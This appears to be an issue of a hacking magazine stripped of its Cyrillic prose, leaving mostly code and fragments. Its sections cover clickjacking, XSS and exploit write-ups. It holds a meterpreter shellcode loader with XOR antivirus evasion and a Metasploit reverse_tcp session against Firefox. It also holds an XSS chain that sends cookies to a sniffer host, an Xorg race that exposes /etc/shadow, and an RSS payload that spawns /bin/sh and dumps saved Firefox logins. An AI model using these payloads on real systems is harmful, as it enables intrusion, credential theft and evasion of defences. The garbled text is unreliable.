(help.github.com/working-withkey-pass-phrases).
git clone
Git , GitHub
.
, -
, (, ,
- , ). GitHub
. jQuery.
GitHub-, clone URL.
URL , ( Git
) , clone:
git clone git://github.com/jquery/jquery.git
Git jquery
. ,
gitk --all.
git push
.
git,
. ! GitHub
(Create Repository), .
,
. GitHub
public clone URL ,
, personal clone URL .
GitHub .
git remote add origin git@github.com:aburgess/My-FirstGitHub-Repo.git
git push origin master
.
origin
private clone URL. git-push master origin (. . GitHub).
,
. GitHub-
.
git pull
push ,
git pull , .
: git fetch ( ) git merge
( ):
git fetch upstream master
git merge upstream/master
. GitHub Git-.
,
. , ,
,
. . , , ,
,
. GitHub , .
Explore GitHub,
Languages ,
. ,
Watch Fork:
Fork , ;
Watch , ,
, dashboard ( , ).
, . ,
, , .
Follow
, . .
Pull Request
Admin. ,
, (wiki,
download, issues) . .
, ,
. ,
,
Pull request.
FOLLOW GITHUB
GitHub .
-, Git
. .
1,1 , 3 . GitHub,
Git. z
PC ZONE
CLICKJACKING: , ,
, :
?,
.
, ,
.
.
,
-.
WWW
:
www.sectheory.
com/clickjacking.htm;
www.contextis.
com/resources/
white-papers/clickjacking;
w2spconf.
com/2010/papers/
p27.pdf;
www.owasp.org/
index.php/Clickjacking.
WARNING
.
.
CLICKJACKING?
,
. click jacking ,
- . , , ! ?
HTML-,
:
- <iframe>;
HTML- ,
;
HTML- ,
z-index.
, HTML-
! ,
, iframe,
, .
iframe
- ,
. , , iframe,
CSS- opacity
""
z-index.
, , , ,
, ,
.
CSS- .
?
clickjacking-.
,
, :
<html> <h1 style="text-align:center"> </h1>
<p style="font-size: 38px;">!
<br> !</p>
<!-- iframe -->
<div style="z-index:10; opacity:0; position:absolute;
top:0px; ">
<iframe scrolling="no" style="width:800px; height:500px;"
src="http://www.bing.com/search?q=buy+kindle+amazon">
</iframe>
</div>
<!-- iframe
-->
<div style="position:absolute; top:200px; left:210px;">
<a href="#"> ?</a>
</div>
</html>
,
Bing.
. ,
.
, , , Retwit Like,
, .
,
.
, , - ?
, , . ,
, -,
WordPress. ,
. -
WordPress, , .
,
Install Now (, , Firefox).
. http://wordpress/wp-admin/
plugin-install.php?tab=plugin-information&plugin=wp-galleryremote, plugin
. , iframe
Install Now. .
, ,
( ). , ,
( zip-)
URL: http://wordpress/wp-content/plugins/.
. ,
? . . ,
PoC SlidePress,
XSS-.
, .
(
)
(security-assessment.com).
WordPress 3.1.3 2011 .
(- !),
clickjacking. .
?
, -
. ,
. JS-,
.
framebuster framekiller, :
if (top.location != location)
top.location = self.location;
X-FRAME-OPTIONS iframe
.
, ?
,
. ,
. iframe,
(,
).
( , ).
iframe anchor (http://example.com/#section),
.
iframe (
, ),
.
, ( -
, ). ,
.
Flash Player,
. .
-
Flash, , ,
-.
, Flash Player
, SWF- , , URL
www.macromedia.com/support/documentation/en/flashplayer/help/
settings_manager02.html. , ,
(: bit.ly/sDR5Qv). proof-of-concept iframe .
,
- . Adobe
, ( framebusting)
. .
. : , Adobe
iframe ,
SWF-,
Flash Player? , !
framebuster- ,
, , - ,
. , ,
,
clickjacking-. (bit.ly/vYFL4x),
framebuster-
.
, , :
<head>
<style> body { display : none;} </style>
</head>
<body>
<script>
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
</script>
, JS-
. ?
, X-FRAME-OPTIONS. ,
! 2009 ,
(Internet Explorer, Safari,
Firefox, Chrome). X-FRAME-OPTIONS . DENY
.
SAMEORIGIN
.
( WordPress
). . -,
. -,
, (
X-FRAME-OPTIONS
). , -, ,
.
-
- . .
function refreshSettings(timeout) {
window.setTimeout(function() {
$('#settings').empty().append($('<iframe allowtransparency="true" src="https://www.macromedia.com/support/flashplayer/sys/settingsmanager2.swf?defaultTab=privacy"></iframe>'));
setSettingsVisibility();
}, timeout);
}
Flash Player'
?
, , ,
SQLi , , XSS. (, , ).
,
. , clickjacking
- ( ),
. FireFox NoScript
(addons.mozilla.org/ru/firefox/addon/noscript)
. ClearClick
,
. , . z
- WordPress
PC ZONE
IPV6-
?
, ,
:
IPv4- .
? ? ?
.
,
IPv4-
IPv6. :
.
IPv6
,
.
uTorrent Teredo
WWW
IPv6:
ipv6-test.com/
speedtest
,
IPv6:
bit.ly/rHoc4B
SixXS
:
bit.ly/v0tOAC
IPv6:
?
128-
(2001:5c0:1400:a::68d) 32- (65.148.151.124)
IPv6-. : IPv6-
, . ,
,
IPv4-. ,
IPv6, IP-,
NAT . , . .
1. ,
NAT.
NAT, IPv4- .
, () IP-
, () . NAT :
, ,
. ICQ, IP-, .
(
), IPv6 .
, , ,
IPv4 IPv6 (
IPv6 ).
, IPv6. ,
, ,
IPv6-
. IPv6
,
( IPv4-) .
IPv6:
IPv6- IPv4-. ,
2. IPv6-.
, -
(, BitTorrent), IPv6
, . ,
. . IP UDP, UDP IPv6, IPv6 TCP- UDP-,
.
, , IPv6- IPv4 (, UDPv4).
, .
IPv6-to-IPv4?
, IPv6
UDPv4-: , ,
.
3. . ,
. , torrent-,
NAT', ,
IP- (
). IPv6-,
. ,
, NAT',
IP- ( IPv6,
). torrent IPv6: uTorrent, Azureus, Transmission.
IPv6 DHT ( ),
, . peers6,
, 18 (16 , 2 ).
, IPv6- ,
. ,
thepiratebay.org ipv6.nnm-club.ru .
4. .
( , ). ,
,
:).
.
. , IPv6- .
, IPv6?
, , , IPv6- . , -,
, -, (
, ), , -, .
, ,
IPv4. , , IPv6-, ,
, .
. .
, . IPv6-,
. . IPv6
( ),
.
NAT, IPv4-, , ,
.
IPv6. .
Gogonet/Freenet6
gogonet.gogo6.com
,
,
NAT. GUI, /56-
. IPv6, ,
, .
.
Hurricane Electric IPv6
http://www.tunnelbroker.net
, /48- IPv6-.
,
(, , , , , ,
), ,
. ,
,
IP.
SixXS
www.sixxs.net
AYIYA-, , ,
IPv6.
(
) 40
. :
(
LinkedIn), .
10 IPv6 (bit.ly/snYfdm).
6to4
IPv4-, 6to4
IPv6.
, . 6to4- IPv6-, 6to4-,
IPv4-, IPv6-. 6to4 IPv6-, anycast- 192.88.99.1. ,
6to4, IPv6- IPv6-.
, .
6to4- 2002:xxyy:zztt,
xx.yy.zz.tt IPv4-,
, ,
192.88.99.1. . 6to4
, 6to4
, ,
, . - ,
. .
IP-,
IPv6. 6to4 . ,
,
, , 200 .
Teredo
,
IP-, NAT. 6to4 -
IPv6-
(, , ) Teredo (, Miredo):
sudo apt-get install miredo
IPV6
1. IPv6 , , 128- . IPv6-
: , 2001:0db8:11a3:09d7:1f34:8a2e:07a0:765d.
0000,
. 2001:0db8:0000:0000:0000:0000:ae21:ad12 2001:db8::ae21:ad12. ,
IPv6-,
: http://[2001:db8::ae21:ad12]. , IPv6-
DNS-.
2. - , , IPv6 ,
IPv4. /prefix'
(CIDR / VLSM). IPv6 /64. . IPv6 /64- , ,
.
/48.
3. NAT'.
, (VoIP), ,
P2p-. .
IPv6:
IPv6-
: , ,
. ,
, (Teredo NAT). .
Teredo IPv6: ,
, (
,
teredo.remlab.net). .
6to4 IPv6-,
, Teredo
. : Teredo-
UDP-, . .
. , Teredo NAT.
ipv6.google.com, netsh int
ipv6 show teredo. :
NAT , Teredo .
( )
.
, , ,
IPv4-,
. , , IPv6-. (bit.ly/vRZwX8),
. ,
. ping
traceroute, ipv6-test.com. :
IPv6,
. ,
, , IPv6-. ,
IPv4-
.
( , ). ,
, .
IPv6 UDPv4
.
( , ) gogo6/
Freenet6 (gogonet.gogo6.com), .
, ,
, IPv6, ,
. freenet6, gogo6,
.
: IPv6-in-IPv4 (
, IP), IPv6-in-IPv4 NAT
Traversal ( IPv6-in-UDP-is-IPv4),
, IP, IPv4-in-IPv6 ( ,
IPv4-, IPv6-).
TSP (Tunnel
Setup Protocol). , .
:
1. gogoCLIENT (gogonet.gogo6.com/
profile/gogoCLIENT).
2. ,
Connect.
,
,
- IPv6- (, ipv6.google.com).
.
3653.
. ,
IPv4- IPv6.
IPv6-, :
1. (gogonet.gogo6.com/page/freenet6registration), freenet6 .
2. Connect Anonymously Connect Using the
Following Credentials, .
3. Connect.
IPv6-,
test-ipv6.com. .
freenet6 - (username.broker.freenet6.net).
,
plain-text'. ,
Advanced PASS DSS
3DES1 Digest MD5.
IPV6
freenet6 , IPv6-,
. ,
,
, (,
). ,
- .
, 10 ,
. z
/ EASY HACK
EASY
HACK
SMS
! , IDS, DMZ,
PDF - ,
. ,
, SMS-, . ,
SMS. ,
, . (
).
, . :) Smsglobal
(www.smsglobal.com). ,
25 SMS- .
, ( Preferences Sender ID)
. ! ,
. ,
,
SMS 1 . ,
,
SMS. , - e-mail,
- SMS. , ,
,
- .
WINDOWS
, Windows 7/2008, ,
, ,
, .
1. .
2. :
.{ED7BA470-8E54-465E-825C-99712043E01C}
- , ,
. ,
EasyHack. :)
,
. , !
. ,
, .
, -.
,
. ! ,
-. ,
. XXI
! -, . :)
Python- Findmyhash
(code.google.com/p/findmyhash). ,
-.
, .
:
python findmyhash_v1.1.2.py MD5 -g \
-h a25b2710ba9de114396adc7dfb0a7235
python findmyhash_v1.1.2.py NTLM -f hacked_domain.txt
:
-h ;
-f ;
-g Google.
,
.
MD5- NTLM-
RDP
, , , ,
,
,
. ,
,
, . , , ,
.
. RDP Windows
.
RDP ,
6- (
Vista Server 2008).
,
rdp-.
. , ?
Default.rdp, (,
RDP 6). , password
51:b: .
,
CryptUnprotectData() crypt32.dll.
, ( ).
,
, , SID
, .
- Cain&Abel
(www.oxid.it).
Remote Desktop Password Decoder
rdp-. C&A
.
, MSF
.
rdp .
MSF, :
1. meterpreter .
2. post-:
run post/windows/gather/enum_rdp_pwd
rdp-
SSLV3-
.
4) ,
1.2, , 3.
,
, . ,
, ( 1.1
1.2). (renegotiation)
( 2) ( 3).
.
(
:)) ?
TLS (Session ID).
, . ,
TCP. . ( 1)
( 1.1). ,
( 3),
.
?
, ,
( , ). (www.g-sec.lu/practicaltls.pdf).
. -,
SSLv3/TLS, HTTPS,
FTPS, SMTPS, POP3S . . , . ?
. ,
- .
, ,
. ,
. , HTTP
:
1. URL. , CSRF,
GET-. header
injection.
1) 1.2
GET /path/to/resource.jsp HTTP/1.0
Ignore-me:
2) , ,
:
GET /path/to/resource.jsp HTTP/1.0
Ignore-me: GET /index.jsp HTTP/1.0
Cookie: sessionCookie=Token
,
HTTP ( 1.2):
GET /url_that_will_302_to_HTTP
Ignore-what-comes-now:
3. XSS . web-
TRACE, JavaScript-.
1.2 :
TRACE / HTTP/1.0
X:This content will be reflected in the response to the client<html><script>alert('XSS')</script></html>
X-ignore:
. PoC. Python,
. :) ,
, - (www.ssllabs.com/ssldb/analyze.
html), ssltest, BackTrack 5,
ssltlstest .
100 %- ,
XOR METERPRETER
:
windows/meterpreter/bind_tcp MSF;
R ;
msfencode ;
-c 5 x86/shikata_ga_nai payload ;
-t c : C;
-o test_3.c .
msfencode,
, . msfpayload c C R, stage ,
(meterpreter -).
, ,
. , MSF payload
,
. msfpayload
- ( ).
- -, ,
. ! main - MSF,
. :
int main (int argc, char **argv)
{
int (*func) ();
func=(int (*)()) buf;
(int)(*func)();
}
meterpreter
. (GCC, VC).
Dev-Cpp.
.
, , meterpreter (,
icmp/udp-, TCP ,
meterpreter).
, XOR . :) XOR -:
unsigned char buf[] = ".shellcode_here";
int main(int argc, char **argv)
{
int i;
for (i=0;i<sizeof buf; i++){
buf[i] = buf[i] ^ 0xcc ;
printf("\\x%02x",buf[i]);
}
}
1.
2.
3.
4.
- .
- , XOR.
main XOR.
main :
int main (int argc, char **argv)
{
int i;
for (i=0;i<sizeof buf; i++){
buf[i] = buf[i] ^ 0xcc ;
}
int (*func) ();
func=(int (*)()) buf;
(int)(*func)();
}
5. .
, , XOR
, (A ^ B ^ B = A).
Avast .
? , .
- ,
( XOR)
.
y0nd13 aka D1g1
. :)
(ivinside.blogspot.com)
(115612, . , .1)
,
! , ,
,
. , !
Apache mod_proxy
CVSSV2
5.0
(AV:N/AC:L/AU:N/C:P/I:N/A:N)
BRIEF
: 11 2011 .
: Rodrigo Marcos.
CVE: CVE-2011-3368.
(, Nginx Squid), Apache ,
mod_proxy.
-
(, ),
, .
, mod_proxy,
.
EXPLOIT
RewriteRule
ProxyPassMatch -,
, -. Apache
. .
, -
:
RewriteRule (.*)\.(jpg|gif|png) http://images.example.com$1.$2 [P]
ProxyPassMatch (.*)\.(jpg|gif|png) http://images.example.com$1.$2
,
. :
GET @other.example.com/something.png HTTP/1.1
:
python apache_scan.py -r www.example.com -u /img/test.gif
, DMZ
python apache_scan.py -r www.example.com -u /img/test.gif \
-d internalhost.local
, DMZ
python apache_scan.py -r www.example.com -u /img/test.gif \
-d internalhost.local -e 80 -g /accounts/index.html
TARGETS
-, , :
SOLUTION
http://images.example.com@other.example.com/something.png
, other.example.com,
images.example.com@ .
URI (@other.example.com/something.png HTTP/1.1)
HTTP,
mod_proxy
(goo.gl/xNIqR). ,
RewriteRule :
RewriteRule /(.*)\.(jpg|gif|png) http://images.example.com/$1.$2 [P]
Xorg
CVSSV2
5.7
(AV:L/AC:L/AU:S/C:C/I:P/A:P)
BRIEF
: 28 2011 .
: vladz.
CVE: CVE-2011-4029.
vladz Xorg, /tmp/.tXn-lock (n
X). .
, X- .
EXPLOIT
Xorg /tmp/.Xn-lock. : ()
/tmp/.tXn-lock O_EXCL PID, /tmp/.Xn-lock, .
/tmp/.Xn-lock. , , .
, chmod() , , /tmp/.tXn-lock
, open().
, /tmp/.tXn-lock
open() ( 296) chmod() ( 318).
, , ... Xorg
( ),
( 341) ,
chmod()?
:
# strace X :1
[...]
open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0
write(0, "      2192\n", 11) = 11
chmod("/tmp/.tX1-lock", 0444) = 0
1. X- (PID n).
2. , SIGSTOP /tmp/.tX1-lock. ,
chmod().
3.
/tmp/.tX1-lock.
4. /tmp/.tX1-lock -> /etc/shadow.
5. SIGCONT, chmod() 444 /etc/shadow.
, ,
X-, ,
. : /tmp/.X1-lock -> /dontexist.
X- FatalError().
exploit-db.com, ID 18040.
:
cc xchmod.c -o xchmod
Array.reduceRight - Mozilla
Firefox
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)
BRIEF
: 13 2011 .
: Chris Rohlf, Yan Ivnitskiy, Matteo Memelli, dookie2000ca,
sinn3r, mr_me, TecR0c.
CVE: CVE-2011-2371.
Metasploit,
Mozilla Firefox 3.6. ,
reduceRight()
.
EXPLOIT
reduceRight callback
:
( callback-),
, , -
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array) {
alert(myobj[0]);
}
obj.reduceRight(f, 1, 2, 3);
</script>
</body>
</html>
. Callback- ( ), .
reduceRight JS-
array_extra jsarray.cpp. 2740
Array.Length :
jsuint length;
if (!js_GetLengthProperty(cx, obj, &length))
    return JS_FALSE;
start = length - 1,
start , length . JS, , :
<html>
<head>
</head>
<body>
<object id="d"><object>
<script>
var myobject = document.getElementById('d');
function spray() {
//...
}
spray();
obj = new Array;
Metasploit.
msf > use exploit/windows/browser/mozilla_reduceright
msf exploit(mozilla_reduceright) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mozilla_reduceright) > set lhost 192.168.0.121
lhost => 192.168.0.121
msf exploit(mozilla_reduceright) > set uripath test
. 12
, ,
Metasploit, . ,
ACDSee FotoSlate 4.0 ( 146) id String,
. PLP-
ACDSee FotoSlate .
SEH- . pop-pop-ret,
, .
0x263a5b57 ipwssl6.dll.
:
msf > use exploit/windows/fileformat/acdsee_fotoslate_string
msf exploit(acdsee_fotoslate_string) > set payload windows/exec
payload => windows/exec
msf exploit(acdsee_fotoslate_string) > set cmd calc.exe
cmd => calc.exe
msf exploit(acdsee_fotoslate_string) > exploit
[*] Creating 'msf.plp' file ...
[*] Generated output file /home/pikofarad/.msf4/data/exploits/msf.plp
mod_proxy
,
( ).
TARGETS
,
. z
TARGETS
, .
ACDSee FotoSlate
id,
PLP-
CVSSV2
10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)
BRIEF
: 10 2011 .
: Parvez Anwar, juan vazquez.
CVE: CVE-2011-2595.
ACD FotoSlate
, ,
4x6 5x7. ,
Xorg
(ICQ: 555-856-204)
DEMOTIVATORS.RU
XSS
- ,
, ()
.
, , XSS demotivators.ru.
WWW
demotivators.ru
;
www.djangoproject.com
Django-.
, .
:
, ,
, .
<b>. -
: <b> !</b>. , ,
?
, <script> <body>.
. XSS-, :
<sCr<bOdY>iPt>
,
, . , - ,
, .
. ,
<b>.
, , , :
<script>, <img>, <body>, <frameset>, <input>, <span>...
, -
PHP- strip_tags(),
. , . , <img> :
: <img src="http://1.com/1.jpg">
: < ="http://1.com/1.jpg">
, strip_tags(),
- . , . , -
XSS
JS-
XSS-
. : ( ),
, . .
, , , ? 2030
JS- , .
JS -:
,
,
XSS:
var servers = [
'http://free1.host1.com/',
'http://free2.host1.com/',
'http://free3.host1.com/',
...
'http://free1.host5.com/',
'http://free2.host5.com/',
'http://free3.host5.com/'
];
for (var key in servers)
{
document.getElementById('footer').innerHTML +=
'<script src="'+servers[key]+'"></script>';
if (loaded){break;}
}
if (loaded){...}
loaded, , .
,
, . ,
.
.
,
PHP ,
. ,
logs.txt, .
$_SERVER['HTTP_USER_AGENT'] ;
$_SERVER['REMOTE_ADDR'] IP-;
$_SERVER['HTTP_REFERER'] ( );
date("d.m.y H:i") ;
urldecode($_GET['c'])
;
$_SERVER['QUERY_STRING']
.
, strip_tags(). ,
Django, .
, ,
XSS-. , , , , .
, ,
- ,
.
, ,
HTML-. HTML,
- -
. , , XSS. - <!DOCTYPE>,
.
XSS ,
- .
.
:
<!><html><head></head><body></body></html>
, -
, ,
, , . <!DOCTYPE>!,
-
demotivators.ru HTML- (<html>
<body>). ,
, ,
, - . :-)
XSS DEMOTIVATORS.RU
XSS ,
.
:
1. - XSS
, vkontakte.ru, mail.ru,
yandex.ru . .
XSS ,
. , demotivators.ru .
, XSS
:
2. . :
, , ,
, JavaScript-,
XSS div-,
,
. ,
:
<script src="http://partner.ru/
js.php?id=123"></script>
:
// ""
function n(){return new Image();}
var xss_1=n(), xss_2=n(), xss_3=n(),
sniff = 'var x = new Image(); x.src
= "http://tvoi.sniffer.com/?c="+
escape(document.cookie);';
// XSS
""
xss_1.src = 'http://site1.ru/search.
php?q="><script>'+sniff+'</script>';
xss_2.src = 'http://site2.ru/search.
php?q="><script>'+sniff+'</script>';
xss_3.src = 'http://site3.ru/search.
php?q="><script>'+sniff+'</script>';
window.onload=function()
{
document.getElementById('banners').
innerHTML = '<script src="http://
partner.ru/js.php?id=123"></script>';
}
3. .
JS + PHP,
. : JS-,
, JS-
, . ,
- .
XSS-, , . , <!DOCTYPE> -
, ,
,
. ,
. <FRAMESET>.
:
<!DOCTYPE><FRAMESET onLoad="{xss}"></FRAMESET>
,
, .
:
<!DOCTYPE><FRAMESET onLoad="{xss}"
style="display:none;"></FRAMESET>
,
action
.
(, )
action-.
(, ).
4. pop-under
pop-up.
<script>, .
5.
iframe. , .
6. - JavaScript:
document.getElementById('id_dema').
src = 'http://host.ru/podmena.jpg';
7. : iframe
(
).
8.
JS-.
{xss} javascript- .
, . .
, ,
. ,
AJAX. , ,
-
HTML + JS. ,
.
.
THE END
.
, (
).
, XSS - .
, , ,
demotivators.ru.
.
:
500 .
12 (180
), .
,
. ! z
DBMX
,
, ,
!
,
.
WWW
www.master-x.com
.
www.gofuckbiz.com
-.
www.rxpblog.com
-.
( ) , .
, .
. ,
. ,
. - ,
.
,
, , . ,
, ,
.
-
, , .
.
OEM
, .
,
,
.
()
. , ,
,
-
,
.
CPA ( )
, -
,
, ,
.
:
:
:
(generics,
,
) .
,
,
,
, ,
.
- ,
,
3050% .
,
-
. -, ,
.
(, , )
.
.
,
.
.
(
).
.
,
.
-
,
, :).
, .
, .
-
.
,
, ,
.
, ,
.
-
.
.
Pharmcash.com
RX-Partners.biz
Stimul-Cash.com
OXOnetwork.com
2010
2006
2006
2007
/ -:
40% ,
100 45%,
300 50%
3050% (
)
75%
70%
, ,
, ,
, ,
, ,
, ,
, ,
., ., ., ., .,
., ., ., .
Visa, MasterCard,
ACH, Wire
$100
$100
$50
$100
,
(
)
(10 ),
:
:
:
. .
. , , xhamster.com
,
.
, .
, ?
, -
.
, ,
.
$30.
-
4060%. , .
, .
(),
.
,
.
,
.
( ),
.
,
().
WordPress .
.
FGH ( ,
). ,
FGH
. , -
, ,
, .
Royal-Cash.com
EarnCoin.com
Aepartnership.com
FerroCash.com
CashManiacs.com
2001
2003
2003
1999
2003
/ -
5060% $3040
50%
50%
50%
50%
44
23
173
58
128
check, wire,
WebMoney, Paxum,
eCoin, ePese
wire, Payoneer,
WebMoney, Paxum,
eCoin
Paxum,
ePayService
check, wire,
WebMoney, Paxum,
ePayService
$100
$100
$300
$50
:
:
:
. Pay per
click . PPC- ,
-. ( ), , .
,
. , ,
. (bid) ,
() . , , ,
, -. PPC- .
, bid, .
, ,
.
,
PPC.
,
.
:
.
,
.
,
,
( ,
).
,
.
.
Bidtraffic.com
Click9.com
Peakclick.com
Daoclick.com
Thegreenppc.com
Bizzclick.com
2004
2008
2005
2009
2009
2009
/ -
7095%
70%
70%
80%
80%
75%
$40
$50
$100
$50
$50
$10
ePassporte,
PayPal,
StormPay,
EPESE,
WebMoney
Epese,
Webmoney,
Wire
Wire,
ePassporte,
Western Union,
WebMoney
Webmoney,
ePassporte,
EPESE,
PayPal, Wire
Webmoney, Wire,
PayPal
ePassporte, PayPal,
StormPay, EPESE,
Visa, MasterCard,
Western Union,
PayPal, Wire, Liberty
Reserve, WebMoney
:
:
:
.
. : , , .
,
, . , , .
, , ,
. (2045%)
.
(, ,
. .).
-,
,
. . ,
-.
.
, ,
.
,
,
.
, .
Uffiliates.com
Affactive.com
Fulltiltpoker.com
AffClub.com
Pokerstarspartners.com
2008
2009
2004
2007
2007
/ -
2540%
3045%
2035%
$70225
2540%
$50150
2030%
$75150
-,
,
-,
MoneyBookers,
Neteller, Wire,
Check
MoneyBookers,
Neteller,
Wire, Check,
Webmoney
Neteller, Visa,
MasterCard, Maestro,
EntroPay, Paysafecard,
Webmoney
Click2Pay, ClickandBuy,
EntroPay, Maestro,
MoneyBookers, Neteller,
Solo, Visa Delta, Visa
Electron, WebMoney, Wire
Instant eChecks,
Moneybookers,
ClickandBuy, Visa,
Neteller, Wire, Check,
WebMoney, EntroPay
:
:
:
,
. -
, , .
,
.
.
, .
( ),
,
.
-. ,
,
: -.
, , .
,
XML ,
.
.
,
.
Glavtorg.com
Stimul-Cash.com
Affiliate-program.Amazon.com
KingsProfit.com
2010
2010
1996
2010
()
()
()
/ -
2535%
25%
48%
25%
Webmoney, Epass,
PayPal, Wire
Check
Webmoney, Wire
$100
$50
$10
$100
oxdef (oxdef.info)
Firefox
, ? , Firefox.
,
.
FIREFOX
Chrome (#06/11) Opera
(#06/11).
. -,
-
. Opera Google
Chrome, FF, ,
.
.
-
-
-.
Firesheep (codebutler.
github.com/firesheep), Wi-Fi
. ,
.
.
WWW
Mozilla:
mzl.la/u2Nol0.
Firefox Defcon 17:
bit.ly/u7BVcS.
,
:
bit.ly/sSzdbO.
chrome/
    content/
        browserOverlay.js
        browserOverlay.xul
    locale/
        en-US/
            browserOverlay.dtd
            browserOverlay.properties
    skin/
        browserOverlay.css
chrome.manifest
install.rdf
Firefox
Install.rdf ( RDF/XML),
.
: , , ,
, (
) . .
updateURL updateKey, .
install.rdf:
<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>helloworld@oxdef.info</em:id>
    <em:name>Hello World</em:name>
    <em:description>Hello world!</em:description>
    <em:version>0.1</em:version>
    <em:creator>Oxdef</em:creator>
    <em:homepageURL>http://oxdef.info</em:homepageURL>
    <em:updateURL>https://oxdef.info/update</em:updateURL>
    <em:type>2</em:type>
    <em:targetApplication><!-- Mozilla Firefox -->
      <Description>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
        <em:minVersion>3.0</em:minVersion>
        <em:maxVersion>6.0.*</em:maxVersion>
      </Description>
    </em:targetApplication>
  </Description>
</RDF>
Mozilla Firefox
XML- XUL (
), , , .
JavaScript, . . XPCOM (. Cross Platform
Component Object Model)
. , , , .
, JavaScript, Java, Python,
C++.
XPCOM-. XPConnect
,
(, ,
, ).
Gecko.
.
, , XPCOM- .
().
XUL- ( content).
XUL- JavaScript:
Mozilla Firefox
<menubar id="main-menubar">
  <menu id="helloworld-hello-menu"
        label="&helloworld.hello.label;"
        accesskey="&helloworld.helloMenu.accesskey;"
        insertafter="helpMenu">
    <menupopup>
      <menuitem id="helloworld-hello-menu-item"
                label="&helloworld.hello.label2;"
                accesskey="&helloworld.helloItem.accesskey;"
                oncommand="XULSchoolChrome.BrowserOverlay.sayHello(event);" />
    </menupopup>
  </menu>
</menubar>
. , , (chrome://...),
. . chrome.manifest
chrome- ,
, , :
content helloworld chrome/content/
overlay chrome://browser/content/browser.xul chrome://helloworld/content/browserOverlay.xul
skin    helloworld classic/1.0 chrome/skin/
locale  helloworld en-US chrome/locale/en-US/
<script type="application/x-javascript"
src="chrome://helloworld/content/browserOverlay.js" />
<stringbundleset id="stringbundleset">
<stringbundle id="helloworld-string-bundle"
src="chrome://helloworld/locale/browserOverlay.properties"/>
</stringbundleset>
, , , .
:
addons.mozilla.org (. AMO);
.
,
.
: updateURL updateKey.
updateURL
, XML/RDF-
.
( )
.
<em:updateURL>http://www.foo.com/update.cgi?id=%ITEM_ID%&amp;version=%ITEM_VERSION%</em:updateURL>
,
,
Wi-Fi. ,
Mozilla ,
HTTP- updateURL.
updateKey. ,
, ,
, :
<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDK42
6erD/H3XtsjvaB5+PJqbhjZc9EDI5OCJS8R3FIObJ9ZHJK1TXeaE7JWq
t9WUmBWTEFvwS+FI9vWu8058N9CHhDNyeP6i4LuUYjTURnn7Yw/Igz
yIJ2oKsYa32RuxAyteqAWqPT/J63wBixIeCxmysfawB/zH4KaPiY3vn
rzQIDAQAB</em:updateKey>
signature ( ) updateHash,
- xpi-
. McCoy
.
AMO
AMO. , ,
, updateURL.
,
:
*** LOG addons.updates: Requesting https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=2&id=inspector@mozilla.org&version=2.0.10&maxAppVersion=8.0a1&status=userEnabled&appID={ec8030f7-c20a-464f-9b0e-13a3a9e97384}&appVersion=5.0&appOS=Linux&appABI=x86_64-gcc3&locale=en-US&currentAppVersion=5.0&updateType=97
*** LOG addons.xpi: Calling bootstrap method startup on jid0t3eeRQgGANLCH9c50lPqcTDuNng@jetpack version 0.0.19
*** LOG addons.updates: Requesting https://localhost/update.rdf
*** WARN addons.updates: HTTP Request failed for an unknown reason
,
, SSL. , , ,
.
AMO, -
. 20
AMO ,
AMO.
RSS-
AMO, ,
.
AMO , , - .
(
).
AMO, . ,
. AMO
AMO. : .
-
.
,
AMO.
, (
) AMO.
, ,
,
.
.
,
,
AMO.
. AMO.
, .
. , , .
. ,
,
. . ,
, ,
. .
:
JavaScript;
Remote XUL;
.
,
, AMO,
.
,
Opera Chrome.
,
. . , chrome://.
, XPCOM ,
.
Firefox
args=["-c","galculator"];
process.run(false,args,args.length);
})()+alert('XSS/foo
</link>
<pubDate>Sun, 21 Aug 2011 21:34:10 +0400</pubDate>
<description>some text</description>
</item>
XPCOM . ,
, .
, , URI data:..?
JS ,
- DOM Based XSS .
. , , , ,
, data-.
Simple RSS Reader AMO
.
, . ,
,
. , RSS-
, , - .
Simple RSS Reader (bit.ly/
t0oJO6),
.
RSS-, , . , - .
,
( ).
. , ,
feedUri.
- :
menuitem.setAttribute('onmouseover',
"SRR.setStatusBar('"+feedUri+"')");
RSS- (
XML-, )
, (
, ) ,
. :) -,
,
... ! !
(, !)
:
<item><title>some title</title>
<link>
data:eeee')+(function()
{
file=Components.classes["@mozilla.org/file/local;1"].
createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("/bin/sh");
process=Components.classes["@mozilla.org/process/util;1"].
createInstance(Components.interfaces.nsIProcess);
process.init(file);
,
.
. .
-, ? -,
,
!
:
var dump = '';
try
{
var myLoginManager = Components.classes[
"@mozilla.org/login-manager;1"].
getService(Components.interfaces.nsILoginManager);
var logins = myLoginManager.getAllLogins({});
for (var i = 0; i < logins.length; i++)
{
dump = dump + logins[i].hostname + ':' +
logins[i].username + ':' + logins[i].password +
'\n';
}
alert(dump);
}
catch(ex)
{
// This will only happen if there is no
// nsILoginManager component class
}
, , eval()
. , , , AMO.
OUTRO
Add-on SDK, JetPack.
XUL!
JavaScript, HTML CSS.
. , ! ;) z
life4u (a.e.faronov@gmail.com)
:
AdSense
10 .
.
,
.
WWW
www.google.com/
adsense Google
AdSense;
direct.yandex.ru
.;
www.spybox.com.
ua
-
SpyBox;
www.adwatcher.com
Adwatcher;
jspy.ru
;
piwik.org
Piwik;
www.google.
com/analytics/
.
( . click fraud )
, () .
( ,
, ),
( ). ,
1015 % .
,
. PPC-.
,
. , . , .
AdSense .
,
. , ,
: AdSense
SpyBox
- Adwatcher
, , (
-, $0,1 ).
: , , - !
.
,
, , .
, , . . ,
,
.
, , .
.
, .
.
.
PPC- (Pay-per-Click , ,
, ). ,
.
(, IP ).
,
.
, ,
,
.
,
.
1. IP-,
, - .
, IP
.
2. ,
, , :
,
,
.
?
:
PPC- ?
, /
. , . 2007
Yahoo! .
Checkmate Strategic Group.
Yahoo!
